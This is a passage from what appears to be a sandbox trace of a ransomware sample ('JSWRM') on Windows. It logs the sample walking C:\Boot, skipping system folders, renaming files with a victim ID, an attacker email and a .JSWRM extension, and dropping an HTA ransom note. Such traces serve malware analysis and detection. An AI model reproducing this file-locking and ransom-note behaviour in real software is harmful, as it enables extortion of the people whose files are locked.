cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.019] CreateFileW (lpFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.019] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0064.019] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.020] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.020] CloseHandle (hObject=0xffffffff) returned 1 [0064.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0064.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0064.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.021] MoveFileW (lpExistingFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\lv-LV\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\lv-lv\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.021] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd0ddae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd0ddae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.022] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.022] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cd0ddae, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cd0ddae, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cd0ddae, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0064.022] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0064.022] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6196d8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xfbcf473f, ftLastWriteTime.dwHighDateTime=0x1d2fa06, nFileSizeHigh=0x0, nFileSizeLow=0xc63a0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0064.022] lstrcmpiW (lpString1="memtest.exe", lpString2=".") returned 1 [0064.022] lstrcmpiW (lpString1="memtest.exe", lpString2="..") returned 1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="...") returned 1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="windows") returned -1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="recovery") returned -1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="perflogs") returned -1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="documents and settings") returned 1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="$RECYCLE.BIN") returned 1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="system volume information") returned -1 [0064.023] lstrcmpiW (lpString1="memtest.exe", lpString2="msocache") returned -1 [0064.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe", cchWideChar=11, lpMultiByteStr=0x345f978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe", lpUsedDefaultChar=0x0) returned 11 [0064.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0064.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.023] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe", cchWideChar=11, lpMultiByteStr=0x345f948, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe", lpUsedDefaultChar=0x0) returned 11 [0064.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0064.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.023] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef62cf52, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2=".") returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="..") returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="...") returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="windows") returned -1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="recovery") returned -1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="perflogs") returned -1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="documents and settings") returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="$RECYCLE.BIN") returned 1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="system volume information") returned -1 [0064.023] lstrcmpiW (lpString1="nb-NO", lpString2="msocache") returned 1 [0064.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0064.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0064.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236db8 [0064.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.024] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nb-no\\jswrm-decrypt.hta")) returned 0xffffffff [0064.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236db8 | out: hHeap=0x1e0000) returned 1 [0064.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.024] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236fe8 [0064.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.025] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nb-no\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.025] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.025] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.028] CloseHandle (hObject=0x450) returned 1 [0064.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236fe8 | out: hHeap=0x1e0000) returned 1 [0064.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2373f8 [0064.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.029] GetFileAttributesW (lpFileName="C:\\Boot\\nb-NO\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\nb-no\\jswrm-decrypt.hta")) returned 0x20 [0064.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2373f8 | out: hHeap=0x1e0000) returned 1 [0064.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.029] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cd3407f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0064.029] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.029] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010e138, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1cd3407f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.030] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.030] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.030] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4912aed, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc4912aed, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211543da, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.030] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0064.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.030] CreateFileW (lpFileName="C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.031] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234336960) returned 0 [0064.031] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.031] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.031] CloseHandle (hObject=0xffffffff) returned 1 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0064.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225bb0 [0064.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.032] RtlAllocateHeap 